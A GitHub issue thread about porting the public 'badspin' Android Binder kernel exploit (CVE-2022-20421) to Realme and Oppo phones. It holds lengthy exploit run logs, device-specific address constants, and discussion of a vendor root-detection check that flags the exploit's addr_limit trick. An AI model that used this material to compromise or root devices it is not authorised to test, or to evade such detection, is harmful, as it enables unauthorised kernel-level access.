0xkol / badspin

Bad Spin: Android Binder Privilege Escalation Exploit (CVE-2022-20421)

How to change certain constants to adapt the exploit for my device #13

Open kjjiffy opened 1 year ago

kjjiffy commented 1 year ago

I am trying to find the replacements for the values 0x28000000 and 0x4010000000. What are these values? Can I find them directly from the boot.img, and if so, which symbols represent them (the ram offset and the other one)? As I am a beginner in this field, any guidance would be a great help. Are there any other values like these that I would need to change?

kjjiffy commented 1 year ago

The output I am getting so far is:

Bad Spin Exploit (CVE-2022-20421) by 0xkol

[x] Looking for binder_proc's inner_lock offset
[x] Trigger vulnerability... (mode = 1)
[14813:14813] New binder client: A
[14815:14815] New binder client: C
[14814:14814] New binder client: B
A: lookup B => handle = 2
C: lookup A => handle = 2
A: Waiting for strong nodes...
A: 1 references accepted
A: Sending 1 strong handles to B
C: Wait for A...
Txn size: 1023.562500KB
B: Searching for magic badcab1ebadcab1e....
B: Destroying
monitor_thread_a: Waiting for death notification
monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
monitor_thread_a: Done
B: Finish.
A: Done sending transaction. BR_FAILED_REPLY
poc_a_wait_for_c_death: Waiting for C death notification
[x] Trigger use-after-free
Testing ptmx 0 (fd 4)
Reading ptmx 0
Testing ptmx 1 (fd 5)
Reading ptmx 1
Freeing ptmx...
poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161)
[x] Finish spinning at spin_lock()
Joining blocker threads...
All blocker threads joined.
offsetof(inner_lock, binder_proc) = 576
[x] Found binder_proc's inner_lock offset: 576 (vuln_fd 72)

[graveyard_process] pid = 15063
[pipe_process:15064] Pinned to CPU 0
[pipe_process:15065] Pinned to CPU 1
[pipe_process:15067] Pinned to CPU 3
[pipe_process:15066] Pinned to CPU 2
[pipe_process:15069] Pinned to CPU 5
[pipe_process:15068] Pinned to CPU 4
[pipe_process:15070] Pinned to CPU 6
[pipe_process:15071] Pinned to CPU 7
[fd_master_process] pid = 15073
[fd_master_process] Creating dup process spawner
[fd_master_process] Creating 50 dup processes
[fd_master_process] Setup 8 pipe processes
[x] Shaping physical memory
[fd_master_process] Creating 5 shapers
[fd_master_process] Waiting for shapers...
[shaper_process:15129] 30000 files sprayed
[shaper_process:15128] 30000 files sprayed
[shaper_process:15127] 30000 files sprayed
[shaper_process:15126] 30000 files sprayed
[shaper_process:15125] 30000 files sprayed
[fd_master_process] Shapers done.
[fd_master_process] Wait for all dup processes to finish
[x] Trigger vulnerability... (mode = 3)
[timer_master_process] pid=15157
[timer_master_process] Wait for C to enter spin_lock()
[15158:15158] New binder client: A
[15160:15160] New binder client: C
[15159:15159] New binder client: B
C: lookup A => handle = 2
A: lookup B => handle = 2
A: Waiting for strong nodes...
B: Searching for magic badcab1ebadcab1e....
A: 1 references accepted
A: Sending 1 strong handles to B
Txn size: 1023.562500KB
C: Wait for A...
B: Destroying
B: Finish.
monitor_thread_a: Waiting for death notification
monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
monitor_thread_a: Done
A: Done sending transaction. BR_FAILED_REPLY
poc_a_wait_for_c_death: Waiting for C death notification
[x] Trigger use-after-free
[x] Waiting for timer threads
poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161)
[timer_master_process] Done.
[x] Finish spinning at spin_lock()
..!...............................................
[x] Failed.

[cleanup_fd_master] Cleanup zombie processes Cleanup dup processes Done. Reset pipe processes Cleanup shapers Done. Cleanup spawner Cleanup done.
[fd_master_process] pid = 15212
[fd_master_process] Creating dup process spawner
[fd_master_process] Creating 50 dup processes
[fd_master_process] Setup 8 pipe processes
[x] Shaping physical memory
[fd_master_process] Creating 5 shapers
[fd_master_process] Waiting for shapers...
[shaper_process:15276] 30000 files sprayed
[shaper_process:15277] 30000 files sprayed
[shaper_process:15279] 30000 files sprayed
[shaper_process:15275] 30000 files sprayed
[shaper_process:15278] 30000 files sprayed
[fd_master_process] Shapers done.
[fd_master_process] Wait for all dup processes to finish
[x] Trigger vulnerability... (mode = 3)
[timer_master_process] pid=15326
[timer_master_process] Wait for C to enter spin_lock()
[15327:15327] New binder client: A
[15329:15329] New binder client: C
[15328:15328] New binder client: B
C: lookup A => handle = 2
A: lookup B => handle = 2
A: Waiting for strong nodes...
B: Searching for magic badcab1ebadcab1e....
A: 1 references accepted
A: Sending 1 strong handles to B
C: Wait for A...
Txn size: 1023.562500KB
B: Destroying
B: Finish.
monitor_thread_a: Waiting for death notification
monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
monitor_thread_a: Done
A: Done sending transaction. BR_FAILED_REPLY
poc_a_wait_for_c_death: Waiting for C death notification
[x] Trigger use-after-free
[x] Waiting for timer threads
poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161)
[x] Finish spinning at spin_lock()
[timer_master_process] Done.
..........................................!.......
[x] Failed.

[cleanup_fd_master] Cleanup zombie processes Cleanup dup processes Done. Reset pipe processes Cleanup shapers Done. Cleanup spawner Cleanup done.
[fd_master_process] pid = 15526
[fd_master_process] Creating dup process spawner
[fd_master_process] Creating 50 dup processes
[fd_master_process] Setup 8 pipe processes
[x] Shaping physical memory
[fd_master_process] Creating 5 shapers
[fd_master_process] Waiting for shapers...
[shaper_process:15581] 30000 files sprayed
[shaper_process:15580] 30000 files sprayed
[shaper_process:15582] 30000 files sprayed
[shaper_process:15579] 30000 files sprayed
[shaper_process:15578] 30000 files sprayed
[fd_master_process] Shapers done.
[fd_master_process] Wait for all dup processes to finish
[x] Trigger vulnerability... (mode = 3)
[timer_master_process] pid=15583
[timer_master_process] Wait for C to enter spin_lock()
[15586:15586] New binder client: C
[15585:15585] New binder client: B
[15584:15584] New binder client: A
C: lookup A => handle = 2
A: lookup B => handle = 2
A: Waiting for strong nodes...
B: Searching for magic badcab1ebadcab1e....
A: 1 references accepted
A: Sending 1 strong handles to B
Txn size: 1023.562500KB
C: Wait for A...
B: Destroying
B: Finish.
monitor_thread_a: Waiting for death notification
monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
monitor_thread_a: Done
A: Done sending transaction. BR_FAILED_REPLY
poc_a_wait_for_c_death: Waiting for C death notification
[x] Trigger use-after-free
[x] Waiting for timer threads
poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161)
[x] Finish spinning at spin_lock()
[timer_master_process] Done.
.................................*................
[fd_master_process] Received 512 pipes
[cleanup_fd_master] Cleanup zombie processes Cleanup dup processes Done. Cleanup shapers Done. Cleanup spawner Cleanup done.
[x] Trying to escalate...
Write page to every pipe Identifying pipe
[identify_pipe] Found corrupted pipe! ret = 41414501
Closing unneeded ptmxs Closing unneeded pipes
[x] Found corrupted ptmx and pipe.
[fd_master_process] Done.
[x] Leaking pipe buffer...
[leak_pipe_buffer] Write to the pipe
[leaker_thread] Wrote 1024 bytes to ptmx
[leak_pipe_buffer] Try read 1024 bytes from ptmx
[x] Leaked pipe buffer operations: ffffffd83cf37a28
[x] Leak pipe buffer operations success
[x] Leaked pipe buffer page : ffffffff20ec1f80
[x] Leak pipe buffer page success
[x] Found kernel base: ffffffd83ac00000
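
As a sanity check on the numbers above (illustrative arithmetic only; badspin itself may locate the kernel base differently): the leaked pipe-buffer operations pointer is a kernel-image address, so subtracting that symbol's offset inside this particular kernel image should give the KASLR-slid kernel base. The 0x2337a28 offset below is simply derived from this log.

#include <stdint.h>
#include <stdio.h>

int main(void) {
    uint64_t leaked_ops  = 0xffffffd83cf37a28ULL; /* "Leaked pipe buffer operations" from the log */
    uint64_t ops_offset  = 0x2337a28ULL;          /* device-specific offset of that symbol in this kernel image (derived from the log) */
    uint64_t kernel_base = leaked_ops - ops_offset;
    printf("kernel base = 0x%llx\n", (unsigned long long)kernel_base); /* 0xffffffd83ac00000, matching the log */
    return 0;
}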

0xkol commented 1 year ago

I manually found a correspondence between the kernel image and the linear mapping. I'm afraid you will have to investigate your device's memory layout further. Which device is it?

kjjiffy commented 1 year ago

It's a Realme device.

0xkol commented 1 year ago

Sorry, I don't own such a device, so I can't assist you with this problem.

kjjiffy commented 1 year ago

Could you please let me know what the ram_offset value means in this context?

0xkol commented 12 months ago

0xa8000000 - 0x80000000 = 0x28000000

See the discussion on issue #12
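
Roughly, as a sketch (assuming 0x80000000 is the physical DRAM base and 0xa8000000 is the physical address the kernel image is loaded at; this is illustrative only, not the exploit's actual code):

#include <stdint.h>
#include <stdio.h>

/* Assumed meaning of the numbers above:
 *   0x80000000 - physical address where DRAM starts on the device
 *   0xa8000000 - physical address the kernel image is loaded at
 * The linear mapping maps RAM starting at the DRAM base, so the kernel image
 * appears ram_offset bytes into it. */
#define DRAM_BASE_PHYS   0x80000000ULL
#define KERNEL_LOAD_PHYS 0xa8000000ULL
#define LINEAR_MAP_BASE  0xffffff8000000000ULL

int main(void) {
    uint64_t ram_offset   = KERNEL_LOAD_PHYS - DRAM_BASE_PHYS;  /* 0x28000000 */
    uint64_t kernel_in_lm = LINEAR_MAP_BASE + ram_offset;       /* where the kernel image starts in the linear map */
    printf("ram_offset           = 0x%llx\n", (unsigned long long)ram_offset);
    printf("kernel in linear map = 0x%llx\n", (unsigned long long)kernel_in_lm);
    return 0;
}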

kjjiffy commented 12 months ago

Thank you so much, Kol, for your timely reply. Now I get the idea, but I'm still stuck in the same position. I suspect the problem is with the constant 0x4010000000. Can you please tell me how you got this number?

0xkol commented 12 months ago

It's a constant for Samsung that converts a kernel image (kimg) virtual address to a linear mapping virtual address. The 0x4010000000 is simply the difference between the kimg base and the linear mapping base (0xffffff8000000000).
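
As a sketch (illustrative only, ignoring KASLR; not badspin's actual code), the two constants combine like this:

#include <stdint.h>
#include <stdio.h>

#define LINEAR_MAP_BASE 0xffffff8000000000ULL
#define KIMG_LM_DELTA   0x4010000000ULL   /* kimg base - linear mapping base (per the comment above) */
#define RAM_OFFSET      0x28000000ULL     /* from the ram_offset discussion above */

/* Hypothetical helper: translate an (unslid) kernel-image VA to its alias in
 * the linear mapping, assuming the kernel is loaded RAM_OFFSET bytes past the
 * DRAM base. */
static uint64_t kimg_to_lm(uint64_t kimg_va) {
    return kimg_va - KIMG_LM_DELTA + RAM_OFFSET;
}

int main(void) {
    uint64_t kimg_base = LINEAR_MAP_BASE + KIMG_LM_DELTA;  /* 0xffffffc010000000 */
    printf("unslid kimg base     = 0x%llx\n", (unsigned long long)kimg_base);
    printf("its linear-map alias = 0x%llx\n", (unsigned long long)kimg_to_lm(kimg_base));
    return 0;
}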

kjjiffy commented 12 months ago

Thank you very much; then that's also confirmed. When I debugged the code, I found that it crashes when the read() function gets called. What might be the reason behind this?

kjjiffy commented 11 months ago

I was able to successfully get the read/write primitives. Thank you so much @0xkol; the conversations with you helped me a lot. Now I need to get root permission.

0xkol commented 11 months ago

Try to replicate what I did on the Pixel 6.

kjjiffy commented 11 months ago

I couldn't get out of the function fix_zombie_processes. While debugging, I found that execution reaches the function "atomic_compare_exchange_strong" and crashes. At that point, a security warning is raised on the device (screenshot: 20231107_115528).

kjjiffy commented 11 months ago

After a number of attempts of this kind, one execution did not cause such an error, but execution stopped without returning from the function "wait_for_uao_ready". What might be the reason? Here is the output of that run:

Bad Spin Exploit (CVE-2022-20421) by 0xkol

[x] Looking for binder_proc's inner_lock offset
[x] Trigger vulnerability... (mode = 1)
[11695:11695] New binder client: A
[11697:11697] New binder client: C
[11696:11696] New binder client: B
A: lookup B => handle = 2
C: lookup A => handle = 2
A: Waiting for strong nodes...
A: 1 references accepted
A: Sending 1 strong handles to B
C: Wait for A...
B: Searching for magic badcab1ebadcab1e....
Txn size: 1023.562500KB
B: Destroying
B: Finish.
monitor_thread_a: Waiting for death notification
monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
monitor_thread_a: Done
A: Done sending transaction. BR_FAILED_REPLY
poc_a_wait_for_c_death: Waiting for C death notification
[x] Trigger use-after-free
Testing ptmx 0 (fd 4)
Reading ptmx 0
Testing ptmx 1 (fd 5)
Reading ptmx 1
Freeing ptmx...
poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161)
[x] Finish spinning at spin_lock()
Joining blocker threads...
All blocker threads joined.
offsetof(inner_lock, binder_proc) = 576
[x] Found binder_proc's inner_lock offset: 576 (vuln_fd 72)

[graveyard_process] pid = 11751
[pipe_process:11752] Pinned to CPU 0
[pipe_process:11753] Pinned to CPU 1
[pipe_process:11754] Pinned to CPU 2
[pipe_process:11755] Pinned to CPU 3
[pipe_process:11756] Pinned to CPU 4
[pipe_process:11757] Pinned to CPU 5
[pipe_process:11758] Pinned to CPU 6
[pipe_process:11759] Pinned to CPU 7
[fd_master_process] pid = 11764
[fd_master_process] Creating dup process spawner
[fd_master_process] Creating 50 dup processes
[fd_master_process] Setup 8 pipe processes
[x] Shaping physical memory
[fd_master_process] Creating 5 shapers
[fd_master_process] Waiting for shapers...
[shaper_process:11822] 30000 files sprayed
[shaper_process:11820] 30000 files sprayed
[shaper_process:11818] 30000 files sprayed
[shaper_process:11819] 30000 files sprayed
[shaper_process:11821] 30000 files sprayed
[fd_master_process] Shapers done.
[fd_master_process] Wait for all dup processes to finish
[x] Trigger vulnerability... (mode = 3)
[timer_master_process] pid=11876
[11879:11879] New binder client: C
[timer_master_process] Wait for C to enter spin_lock()
[11877:11877] New binder client: A
[11878:11878] New binder client: B
C: lookup A => handle = 2
A: lookup B => handle = 2
A: Waiting for strong nodes...
B: Searching for magic badcab1ebadcab1e....
A: 1 references accepted
A: Sending 1 strong handles to B
C: Wait for A...
Txn size: 1023.562500KB
B: Destroying
B: Finish.
monitor_thread_a: Waiting for death notification
monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
monitor_thread_a: Done
A: Done sending transaction. BR_FAILED_REPLY
poc_a_wait_for_c_death: Waiting for C death notification
[x] Trigger use-after-free
poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161)
[x] Finish spinning at spin_lock()
[x] Waiting for timer threads
[timer_master_process] Done.
..................................................
[x] Failed.

[cleanup_fd_master] Cleanup zombie processes Cleanup dup processes Done. Reset pipe processes Cleanup shapers Done. Cleanup spawner Cleanup done.
[fd_master_process] pid = 11945
[fd_master_process] Creating dup process spawner
[fd_master_process] Creating 50 dup processes
[fd_master_process] Setup 8 pipe processes
[x] Shaping physical memory
[fd_master_process] Creating 5 shapers
[fd_master_process] Waiting for shapers...
[shaper_process:12009] 30000 files sprayed
[shaper_process:12013] 30000 files sprayed
[shaper_process:12010] 30000 files sprayed
[shaper_process:12011] 30000 files sprayed
[shaper_process:12012] 30000 files sprayed
[fd_master_process] Shapers done.
[fd_master_process] Wait for all dup processes to finish
[x] Trigger vulnerability... (mode = 3)
[timer_master_process] pid=12058
[12059:12059] New binder client: A
[timer_master_process] Wait for C to enter spin_lock()
[12061:12061] New binder client: C
[12060:12060] New binder client: B
C: lookup A => handle = 2
A: lookup B => handle = 2
A: Waiting for strong nodes...
A: 1 references accepted
A: Sending 1 strong handles to B
B: Searching for magic badcab1ebadcab1e....
Txn size: 1023.562500KB
B: Destroying
B: Finish.
C: Wait for A...
monitor_thread_a: Waiting for death notification
monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
monitor_thread_a: Done
A: Done sending transaction. BR_FAILED_REPLY
poc_a_wait_for_c_death: Waiting for C death notification
[x] Trigger use-after-free
[x] Waiting for timer threads
poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161)
[x] Finish spinning at spin_lock()
[timer_master_process] Done.
...............*..................................
[fd_master_process] Received 512 pipes
[cleanup_fd_master] Cleanup zombie processes Cleanup dup processes Done. Cleanup shapers Done. Cleanup spawner Cleanup done.
[x] Trying to escalate...
Write page to every pipe Identifying pipe
[identify_pipe] Found corrupted pipe! ret = 414144e0
Closing unneeded ptmxs Closing unneeded pipes
[x] Found corrupted ptmx and pipe.
[fd_master_process] Done.
[x] Leaking pipe buffer...
[leak_pipe_buffer] Write to the pipe
[leaker_thread] Wrote 1024 bytes to ptmx
[leak_pipe_buffer] Try read 1024 bytes from ptmx
[leak_pipe_buffer] Try read 403 bytes from ptmx
[leak_pipe_buffer] Try read 403 bytes from ptmx
[x] Leaked pipe buffer operations: ffffffe96d137a28
[x] Leak pipe buffer operations success
[x] Leaked pipe buffer page : ffffffff2091d1c0
[x] Leak pipe buffer page success
[x] Found kernel base: ffffffe96ae00000
kallsyms_token_table file offset 0x220ef50
kallsyms_token_index file offset 0x220f300
kallsyms_markers file offset 0x220e6f0
kallsyms_num_syms (approx) 0x21700
kallsyms_num_syms (exact) 0x21638
kallsyms_relative_base 0xffffffe96ae00000
kallsyms_names file offset 0x202fd58
kallsyms_offsets file offset 0x1faa468
[x] kallsyms found successfully!
[x] Kernel base: ffffffe96ae00000
[x] Found init_task: ffffffe96d7bbe40
[x] task_struct offsets:
tasks at 1224
pid at 1480
tgid at 1484
thread_group at 1656
files at 1984
cred at 1920
[x] files_struct offsets:
fdt at 32
[x] task_struct: ffffff80481e1280
[pipe_kwrite] kaddr = ffffff80481e1288 page = ffffffff01007840 size = 00000008
[pipe_close] Found task struct: ffffff8037544a00
file->private_data offset: 216
Candidate write_buf offset: 752 (ffffff87916f0000)
[pipe_kwrite] kaddr = ffffff88dcbaa2f0 page = ffffffff2352ea80 size = 00000008
Switched to UAO-based read/write primitive
[x] Successfully upgraded to stable RW primitives. \o/
Fixup zombie processes
Fixup pid = 11751

CRASHED AFTER THIS

kjjiffy commented 11 months ago

May I know what the "Fixup zombie processes" function is actually trying to do?

kjjiffy commented 11 months ago

The content of adb logcat after obtaining the kernel base is here:

11-09 11:22:19.650 11944 11944 I BADSPIN : [leak_pipe_buffer] Write to the pipe
11-09 11:22:19.651 11944 13022 I BADSPIN : [leaker_thread] Wrote 1024 bytes to ptmx
11-09 11:22:19.651 11944 11944 I BADSPIN : [leak_pipe_buffer] Try read 1024 bytes from ptmx
11-09 11:22:19.652 11944 11944 I BADSPIN : [leak_pipe_buffer] Try read 777 bytes from ptmx
11-09 11:22:19.652 11944 11944 I BADSPIN : [leak_pipe_buffer] Try read 628 bytes from ptmx
11-09 11:22:19.652 11944 11944 I BADSPIN : [x] Leaked pipe buffer oprerations: ffffffe2f0937a28
11-09 11:22:19.652 11944 11944 I BADSPIN : [x] Leaked pipe buffer page : ffffffff20c8c580
11-09 11:22:19.749 11944 11944 I BADSPIN : kallsyms_token_table file offset 0x220ef50
11-09 11:22:19.749 11944 11944 I BADSPIN : kallsyms_token_index file offset 0x220f300
11-09 11:22:19.749 11944 11944 I BADSPIN : kallsyms_markers file offset 0x220e6f0
11-09 11:22:19.749 11944 11944 I BADSPIN : kallsyms_num_syms (approx) 0x21700
11-09 11:22:19.750 11944 11944 I BADSPIN : kallsyms_num_syms (exact) 0x21638
11-09 11:22:19.750 11944 11944 I BADSPIN : kallsyms_relative_base 0xffffffe2ee600000
11-09 11:22:19.751 11944 11944 I BADSPIN : kallsyms_names file offset 0x202fd58
11-09 11:22:19.751 11944 11944 I BADSPIN : kallsyms_offsets file offset 0x1faa468
11-09 11:22:19.751 11944 11944 I BADSPIN : [x] kallsyms found successfully!
11-09 11:22:19.751 11944 11944 I BADSPIN : [x] Kernel base: ffffffe2ee600000
11-09 11:22:19.780 11944 11944 I BADSPIN : [x] Found init_task: ffffffe2f0fbbe40
11-09 11:22:19.780 11944 11944 I BADSPIN : [x] task_struct offsets:
11-09 11:22:19.780 11944 11944 I BADSPIN : tasks at 1224
11-09 11:22:19.780 11944 11944 I BADSPIN : pid at 1480
11-09 11:22:19.780 11944 11944 I BADSPIN : tgid at 1484
11-09 11:22:19.780 11944 11944 I BADSPIN : thread_group at 1656
11-09 11:22:19.780 11944 11944 I BADSPIN : files at 1984
11-09 11:22:19.780 11944 11944 I BADSPIN : cred at 1920
11-09 11:22:19.780 11944 11944 I BADSPIN : [x] files_struct offsets:
11-09 11:22:19.780 11944 11944 I BADSPIN : fdt at 32
11-09 11:22:19.781 11944 13025 I BADSPIN : [wait_for_uao_new_job] entered
11-09 11:22:19.819 11944 11944 I BADSPIN : [x] task_struct: ffffff88605adc80
11-09 11:22:19.819 11944 11944 I BADSPIN : [wait_for_uao_ready] entered
11-09 11:22:19.819 11944 11944 I BADSPIN : [set_uao_new_job] entered
11-09 11:22:19.819 11944 11944 I BADSPIN : [set_uao_new_job] @ after atomic_thread_fence
11-09 11:22:19.819 11944 11944 I BADSPIN : [uao_kread] reached from set_uao_new_job
11-09 11:22:19.820 2384 2384 E OPLUS_KEVENT_RECORD: oplus_kevent Receive message from kernel, event_type=0
11-09 11:22:19.820 2384 2384 E OPLUS_KEVENT_RECORD: OPLUS_KEVENT payload:2000$$old_euid@@2000$$old_egid@@2000$$sys_call_number@@64$$addr_limit@@ffffffffffffffff$$curr_uid@@2000$$curr_euid@@2000$$curr_egid@@2000$$curr_name@@sleep$$ppid@@11132$$ppidname@@sh$$enforce@@1
11-09 11:22:19.820 2384 2384 E OPLUS_KEVENT_RECORD:
11-09 11:22:19.820 2384 2384 E OPLUS_KEVENT_RECORD: KEVENT_ROOT_EVENT uid_num:2000
11-09 11:22:19.821 2384 2384 I OPLUS_KEVENT_RECORD: oplus_package_list_parser_cb,name=com.android.shell
11-09 11:22:19.821 2384 2384 I OPLUS_KEVENT_RECORD: Enter oplus_record_kevent_to_file loop
11-09 11:22:19.839 2384 2384 I OPLUS_KEVENT_RECORD: Time of bootup(s) 200
11-09 11:22:19.845 2384 2384 W OPLUS_KEVENT_RECORD: Client find Service
11-09 11:22:19.845 2384 2384 W OPLUS_KEVENT_RECORD: Client call server diaplayDialog method
11-09 11:22:19.845 2384 2384 W OPLUS_KEVENT_RECORD: Client call set uid:2000
11-09 11:22:19.849 2639 3809 D CompatibilityChangeReporter: Compat change id reported: 157233955; UID 1000; state: ENABLED
11-09 11:22:19.850 2384 2384 W OPLUS_KEVENT_RECORD: Server exepction code: 0
11-09 11:22:19.856 11944 11944 I BADSPIN : [pipe_close] Found task struct: ffffff88153aca00
11-09 11:22:19.856 11944 11944 I BADSPIN : file->private_data offset: 216
11-09 11:22:19.856 11944 11944 I BADSPIN : Candidate write_buf offset: 752 (ffffff8847650000)
11-09 11:22:19.856 11944 11944 I BADSPIN : Switched to UAO-based read/write primitive
11-09 11:22:19.856 11944 11944 I BADSPIN : [x] Successfully upgraded to stable RW primitives. \o/
11-09 11:22:19.856 11944 11944 I BADSPIN : Fixup zombie processes
11-09 11:22:19.856 11944 11944 I BADSPIN : Fixup pid = 12000
11-09 11:22:19.856 11944 11944 I BADSPIN : [wait_for_uao_ready] entered

As seen above, an oplus_kevent is raised right after the call to atomic_store(&uao->state, uao_state_new_job);.

Is there any way to resolve this issue?
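
For context, here is a minimal user-space mock of the handshake those log tags suggest (wait_for_uao_ready / set_uao_new_job / uao_kread): a worker thread with the widened addr_limit advertises readiness through an atomic state word and then services read jobs posted by the main thread. All names and states below are assumptions for illustration, not badspin's actual definitions.

#include <pthread.h>
#include <stdatomic.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

enum uao_state { UAO_IDLE, UAO_READY, UAO_NEW_JOB, UAO_DONE };

struct uao_ctx {
    _Atomic int state;
    uint64_t kaddr;      /* kernel address the main thread wants read */
    uint8_t out[8];      /* result buffer */
};

static void *uao_worker(void *arg)
{
    struct uao_ctx *uao = arg;
    atomic_store(&uao->state, UAO_READY);              /* lets the main thread's wait loop return */
    while (atomic_load(&uao->state) != UAO_NEW_JOB)    /* "wait_for_uao_new_job" */
        ;
    /* The real worker would copy from uao->kaddr via the widened addr_limit;
     * the mock just fabricates 8 bytes so the example runs anywhere. */
    memset(uao->out, 0x41, sizeof(uao->out));
    atomic_store(&uao->state, UAO_DONE);
    return NULL;
}

int main(void)
{
    struct uao_ctx uao = { .state = UAO_IDLE, .kaddr = 0xffffff8012345678ULL };
    pthread_t t;
    pthread_create(&t, NULL, uao_worker, &uao);
    while (atomic_load(&uao.state) != UAO_READY)       /* "wait_for_uao_ready" */
        ;
    atomic_store(&uao.state, UAO_NEW_JOB);             /* "set_uao_new_job" */
    while (atomic_load(&uao.state) != UAO_DONE)        /* wait for the mock "uao_kread" */
        ;
    pthread_join(t, NULL);
    printf("mock kread of 0x%llx done\n", (unsigned long long)uao.kaddr);
    return 0;
}

If the worker thread were killed or blocked (for example by whatever the detection triggers), the main thread would spin forever in that first wait loop, which would be consistent with the hang in wait_for_uao_ready.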

kjjiffy commented 11 months ago

While searching for "oplus_kevent" in the kernel source code, I found a function oplus_root_check_succ().

Traceback =>

oplus_root_check_succ() ← oplus_root_check_post_handler() [ which checks if (get_fs() > 8000000000); get_fs() returns the addr_limit of the current thread ] ← oplus_get_post_hook() ← oplus_hook_init()/exit()

Could that be the reason?
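
To make the check concrete, here is a tiny user-space mock of the cited condition (treating the 8000000000 threshold as the hex constant 0x8000000000, which would sit just above a 39-bit USER_DS; both of those readings are assumptions, and this is not the vendor's actual code):

#include <stdint.h>
#include <stdio.h>

/* Stand-in for the kernel's get_fs(): in the real hook it returns the current
 * thread's addr_limit. */
static uint64_t get_fs_mock(uint64_t addr_limit) { return addr_limit; }

/* Mirrors the cited condition: flag any thread whose addr_limit was raised
 * above the normal user-space limit. */
static int oplus_style_root_check(uint64_t addr_limit)
{
    return get_fs_mock(addr_limit) > 0x8000000000ULL;
}

int main(void)
{
    /* Normal thread (assumed 39-bit USER_DS-style limit): not flagged. */
    printf("USER_DS-like limit flagged:   %d\n", oplus_style_root_check(0x0000007fffffffffULL));
    /* addr_limit overridden to all-ones (KERNEL_DS), as in the OPLUS_KEVENT
     * payload above (addr_limit@@ffffffffffffffff): flagged. */
    printf("KERNEL_DS-like limit flagged: %d\n", oplus_style_root_check(0xffffffffffffffffULL));
    return 0;
}

That would explain why the OPLUS_KEVENT payload in the logcat reports addr_limit@@ffffffffffffffff right after the UAO-based primitive is set up.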

0xkol commented 11 months ago

Yeah, it seems that the method of getting virtual r/w by overriding the addr_limit is detected by this rooting-detection mechanism. Unfortunately, I believe you will have to find some other method.

kjjiffy commented 11 months ago

Sure, I will try to figure it out @0xkol. Thanks a lot for your help.

kjjiffy commented 10 months ago

I was able to successfully exploit devices with kernels 5.4 and 5.10 that do not include the rooting-detection mechanism oplus_root_check_succ(). Thanks a lot for your valuable support in the beginning; it helped me a lot.

Out of curiosity, I have a question regarding adapting this exploit to the 4.19 kernel. I can see that this kernel is vulnerable, but is it possible to adapt the badspin exploit for 4.19 as well?

Ko-Hi-Dev commented 2 months ago

@kjjiffy do you mind sharing your source code for badspin? I'm trying to get root access on my Oppo Find N.

I haven't figured out what makes it crash (I haven't logged it yet), but I assume it's similar to your issue.

I only started working on getting root yesterday, but the source would be appreciated if available.

kjjiffy commented 2 months ago

Sorry, but it won't be possible to share the modified source code, since I keep only the base badspin code. But if you can share the logs and a link to the kernel source code, and let me know the dev_config of the Oppo Find N, then I can at least help you. BTW, if you're expecting a solution for https://github.com/0xkol/badspin/issues/13#issuecomment-1804999597, then I cannot help you, as I didn't succeed in bypassing it.
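
For reference, the kind of per-device information I mean looks roughly like this (the field names are hypothetical, so check badspin's actual dev_config definition in the repo; the values shown are just the ones discussed earlier in this issue):

#include <stdio.h>

/* Hypothetical shape only; the real structure in badspin may differ. */
struct dev_config_example {
    const char *model;                  /* device/fingerprint string to match    */
    unsigned long long ram_offset;      /* kernel physical load addr - DRAM base */
    unsigned long long kimg_lm_delta;   /* kimg base - linear mapping base       */
    /* ...plus any kernel-version-specific struct offsets the exploit needs.     */
};

int main(void)
{
    struct dev_config_example cfg = {
        .model         = "example-device",
        .ram_offset    = 0x28000000ULL,     /* value from this thread */
        .kimg_lm_delta = 0x4010000000ULL,   /* value from this thread */
    };
    printf("%s: ram_offset=0x%llx kimg_lm_delta=0x%llx\n",
           cfg.model, cfg.ram_offset, cfg.kimg_lm_delta);
    return 0;
}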

Ko-Hi-Dev commented 2 months ago

I'm unsure if the kernel source is available, but I can check later as well.

You don't have the modified source left?

Also, can you share the exploit you built? Maybe I can try to compare as well. I tried to do this on my Vivo a while ago but didn't succeed back then.

Ah I see, so it didn't succeed on the Realme?